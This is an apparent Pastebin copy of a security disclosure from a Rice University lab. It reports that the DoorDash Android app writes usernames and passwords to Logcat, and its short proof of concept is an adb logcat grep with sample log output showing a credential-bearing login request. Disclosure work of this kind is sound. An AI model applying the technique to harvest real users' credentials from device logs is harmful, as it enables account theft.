Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
- # Exploit Title: DoorDash Android App - Username/Password Logging
- # Application: DoorDash
- # Version: 11.0.2 ~ 11.5.2 (all versions we tested have this problem)
- # Software Link: https://play.google.com/store/apps/details?id=com.dd.doordash
- # Company: DoorDash
- # Installs: 10,000,000+ (#1 in food category in Google Play)
- # Impact: Looking at the output of Logcat, hackers can get username and password of DoorDash
- # Category: Mobile Apps
- # Tested on: Android 9
- ---Description---
- Usernames and passwords are stored in the log during the authentication. So, hackers can obtain user password/ID of DoorDash, simply looking at Logcat. Especially, in old Android versions prior to Android Jelly Bean, any app installed can access Logcat without any permission.
- ---Vendor feedback---
- We have reported this issue, and they will fix it soon.
- ---PoC---
- 1. Try to log in DoorDash Android app, Android app.
- - Opening Login UI
- - Enter credentials. Fake information is enough for reproducing.
- 2. Search password in Logcat
- $ adb logcat | grep 'OkHttp'
- 10-07 16:09:34.498 10066 10201 D OkHttp : --> POST https://api.doordash.com/v2/auth/token/
- 10-07 16:09:34.498 10066 10201 D OkHttp : Content-Type: application/json; charset=UTF-8
- 10-07 16:09:34.498 10066 10201 D OkHttp : Content-Length: 109
- 10-07 16:09:34.498 10066 10201 D OkHttp : X-NewRelic-ID: XAUEWF5SGwEJUFhUDwcA
- 10-07 16:09:34.498 10066 10201 D OkHttp : {"client_id":"6086ebcbfb859ee3","email":"jaeho.lee@rice.edu","is_manual":true,"password":"MyPasswordIsHere!"}
- 10-07 16:09:34.498 10066 10201 D OkHttp : --> END POST (109-byte body)
- ---Reporter---
- Jaeho Lee(Jaeho.Lee@rice.edu)
- Rice Computer Security Lab
- Rice University
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.
